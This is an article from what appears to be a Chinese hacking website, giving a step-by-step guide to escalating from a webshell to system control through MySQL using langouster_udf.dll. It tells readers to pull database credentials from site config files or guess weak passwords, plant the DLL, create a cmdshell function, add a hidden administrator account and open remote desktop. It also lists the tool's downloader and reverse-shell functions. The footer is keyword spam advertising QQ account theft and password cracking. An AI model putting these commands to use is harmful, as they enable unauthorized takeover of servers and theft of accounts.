a您现在的位置: 主页 > 黑客基地 > 入侵检测 > 文章内容

MYSQL提权之langouster_udf.dll详解

作者: 黑客基地 来源:黑客入侵 时间: 2015-06-27 阅读: 入侵检测
当我们拿到一个网站的webshell可以,进一步想提权获得服务器,可以尝试用MYSQL提权,下面就讲解下具体方法: MYsql提权就必须知道mysql数据库的帐号密码。

 

可以在网站的程序里面来查看 conn.php config.php 有时候里面会存mysql数据库的账户密码。

 

常见格式为:

 


  1. $dbhost = 'localhost'; // 数据库服务器 $dbuser = 'root'; // 数据库用户名 $dbpw = 'root'; // 数据库密码 $dbname = 'discuz'; // 数据库名

如果里面没有也可以尝试使用弱口令 root root root 123 等。 具体还是要看大家发挥。

已知mysql的帐号密码后就可以上传我们这篇文章所需要用到工具UDF提权工具 全称 langouster_udf.dll 文章下面有下载地址

下载好以后上传到网站的服务器然后访问后就可以输入mysql的帐号密码还有数据库名进行连接

假设帐号密码和数据库名字为 root root discuz 就可以这样输入 .

然后点击提交就连接上去了。 连接以后需要导出udf.dll

如果是服务器是2000系统就导出 C:\Winnt\udf.dll 如果是服务器是2003系统就导出C:\Windows\udf.dll

导出成功以后就可以执行命令了。

create function cmdshell returns string soname ‘udf.dll’

先创建一个函数

select cmdshell(‘net user exehack.net exehack.net /add’);

添加帐号密码 select cmdshell(‘net localgroup administrators exehack.net /add’);

提交到管理组

如果服务器3389有开放的话就可以直接进行登录服务器了。如果没有开放

select cmdshell(‘C:/PHPnow/htdocs/3389.exe’);

这个是把开3389的文件放到C盘,然后运行,我们服务器开了3389就不需要执行这步,当然也可以使用VBS的脚本用来开启3389

以下是对langouster_udf.dll详解介绍。 一、功能:利用MYSQL的Create Function语句,将MYSQL账号转化为系统system权限。

 

二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。三、使用帮助:第一步:将本文件上传到目标机上,填入你的MYSQL账号经行连接。第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到”No paths allowed for shared library”错误。第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname ‘导出的DLL路径’;对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则你将会看到”Can’t open shared library”错误,这时你必须将DLL重新导出到系统目录。 第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名(‘参数列表’); 每个函数有不同的参数,你可以使用select 创建的函数名(‘help’);来获得指定函数的参数列表信息。第五步:使用完成后你可能需要删除在第二步中导出的DLL,但在删除DLL前请先删除你在第三步中创建的函数,否则删除操作将失败,删除第三步中创建的函数的SQL语句为:drop function 创建的函数名;四、功能函数说明:cmdshell 执行cmd; downloader 下载者,到网上下载指定文件并保存到指定目录; open3389 通用开3389终端服务,可指定端口(不改端口无需重启); backshell 反弹Shell; ProcessView 枚举系统进程;

KillProcess 终止指定进程;regread 读注册表;

regwrite 写注册表; shut 关机,注销,重启;

about 说明与帮助函数;l
盗号网站|盗QQ|盗QQ号教程|盗QQ号密码|盗QQ号码|盗QQ密码软件|恢复QQ聊天记录|怎么破解QQ密码|怎样盗QQ密码|怎么盗QQ|怎样破解QQ号|黑客技术|QQ密码暴力破解器|盗号方法|盗号软件|怎么盗QQ|盗QQ密码|恢复QQ聊天记录|盗QQ软件|QQ密码破解软件|QQ黑客工具|免费黑客网|黑客基地|黑客联盟_www.heike.hk